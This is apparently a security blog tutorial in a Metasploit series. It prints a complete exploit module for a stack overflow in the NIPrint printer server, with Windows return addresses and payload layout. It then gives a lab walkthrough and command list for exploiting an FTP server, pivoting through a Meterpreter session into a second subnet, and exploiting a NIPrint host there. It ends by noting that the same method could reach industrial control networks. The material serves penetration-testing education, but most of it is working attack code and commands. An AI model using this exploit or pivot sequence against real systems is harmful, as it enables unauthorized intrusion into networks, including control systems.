Metasploit Basics – Part 4: Exploit and Attack Example
A couple weeks ago I rewrote a vulnerability for Metasploit that I originally wrote for CANVAS. The exploit is for a network printer application called NIPrint. It is a pretty basic stack overflow vulnerability and the language to the exploit is fairly straight forward.
The key parts, from a Metasploit user’s prospective, is the Target section and the options section. A user will need to select the host ip and the port, if the port is not the default, and the target operating system, the default target default is Windows 2000. The top portion of the code sets up the options while the lower section performs the actual exploit.
require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'NIPrint stack overflow', 'Description' => %q{ This module exploits a stack overflow in NIPrint server. }, 'Author' => [ 'Charles Perine' ], 'Version' => '$Revision: 9999 $', 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00\x0a\x0d\x25\x26\x3f", }, 'Platform' => 'win', 'Targets' => [ ['Win2k SP4 Eng', { 'Ret' => 0x7C2EE9BB } ], ['WinXP SP3 Eng', { 'Ret' => 0x77DF9697 } ], ], 'DefaultTarget' => 0, 'Privileged' => false )) register_options( [ Opt::RPORT(515) ], self.class) end def exploit connect noppersled1 = make_nops(47) jmpcode = "\xeb\x10" noppersled2 = make_nops(20) eip = [target.ret].pack('V') sploit = noppersled1 + jmpcode + eip + noppersled2 + payload.encoded sock.put(sploit) handler disconnect end end
What follows is a run through of a hack detailing some of the subjects I covered in this and my previous Metasploit entries. My attack machine is on the same subnet, 192.168.76.0/24, as a Windows XP system with a vulnerable FTP server at 192.168.76.136. The FTP server is connected to another subnet, 10.0.0.0/24, with a machine running Windows 2000, 10.0.0.1, and the NIPrint application. In this example I will not show system scanning, using a tool like Nessus, simply exploitation.
First I ran the exploit against the FTP server.
Once connected, I check to see what other networks the FTP server is connected to. We see that the it is connected to the 10.0.0.0/24 network. To perform the pivot, I simply add the a network route for the Meterpreter session, session 1. Next I ran an enumeration script to see what other systems were available.
From the scan, I can see the 10.0.0.1 system is available. While I know that the system second system is running the NIPrint server, an attacker would use other reconnaissance tools, or simply monitor the network, to determine a system on the network is running the NIPrint application.
Now I run the exploit against the second system and we can see it’s routing tables are different from the first system.
Here is a list of commands I used:
use windows/ftp/easyftp_cwd_fixret set PAYLOAD windows/meterpreter/bind_tcp set RHOST 192.168.76.136 show options exploit route background route add 10.0.0.0 255.255.255.0 1 sessions -i 1 run netenum -ps -r 10.0.0.0/16 background use windows/misc/myniprint set PAYLOAD windows/meterpreter/bind_tcp set RHOST 10.0.0.1 show options exploit route
Many of the sites we visit have a common setup using an RDP station sitting on the DMZ in between the corporate network and control network. That system can typically RDP to one other system in the control network. Once on the control network, there is very little access control to all of the systems. Using a similar methodology to the one described above, an attacker could work his way to the RDP stations then into the control network.